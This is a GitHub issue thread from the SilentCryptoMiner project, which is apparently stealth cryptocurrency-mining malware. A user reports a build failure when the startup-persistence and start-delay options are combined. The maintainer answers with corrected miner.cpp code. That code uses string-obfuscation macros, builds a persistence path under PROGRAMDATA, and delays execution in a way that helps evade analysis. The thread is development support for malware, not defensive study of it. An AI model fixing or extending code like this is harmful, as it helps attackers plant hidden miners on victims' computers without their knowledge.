### ISSUE TITLE
incompatibility of StartDelay 0 and StartUp

### ISSUE THREAD

**Issue by DragonTops** [UnamSanctam/SilentCryptoMiner#2032]
Whenever you set up StartUp and set StartDelay to 0 will result in failure to compile miner. Looking into the source code felt like a fever dream, because everything else looks pretty straightforward but this section in miner.cpp is strange:

```
#if DefStartDelay
#if DefStartup
    wchar_t startupPath[MAX_PATH] = { 0 };
    combine_path(startupPath, get_env(pebenv, isAdmin ? AYU_OBFW(L"PROGRAMDATA=") : AYU_OBFW(L"$BASEDIR")), AYU_OBFW(L"#STARTUPFILE"));
    if (wcsicmp(exePath, startupPath) != 0) {
#endif
        LARGE_INTEGER sleeptime;
        sleeptime.QuadPart = -(AYU_OBFC($STARTDELAY * 10000));
        UtDelayExecution(FALSE, &sleeptime);
#if DefStartup
}
#endif
#endif

```
I dont think those should be nested into each other. Also if its intentional maybe there should be warning or something.
Logs:
[g++.log](https://github.com/UnamSanctam/SilentCryptoMiner/files/13672926/g%2B%2B.log)

BTW, thanks you for your incredible work.

**Comment by UnamSanctam** [comment]
Sorry for the late response, I had a lot of meeting yesterday.
You are correct, but they should be nested like that but not all of it which is the problem, it should be like this:
```
#if DefStartup
    wchar_t startupPath[MAX_PATH] = { 0 };
    combine_path(startupPath, get_env(pebenv, isAdmin ? AYU_OBFW(L"PROGRAMDATA=") : AYU_OBFW(L"$BASEDIR")), AYU_OBFW(L"#STARTUPFILE"));
#endif
#if DefStartDelay
#if DefStartup
    if (wcsicmp(exePath, startupPath) != 0) {
#endif
        LARGE_INTEGER sleeptime;
        sleeptime.QuadPart = -(AYU_OBFC($STARTDELAY * 10000));
        UtDelayExecution(FALSE, &sleeptime);
#if DefStartup
}
#endif
#endif
```
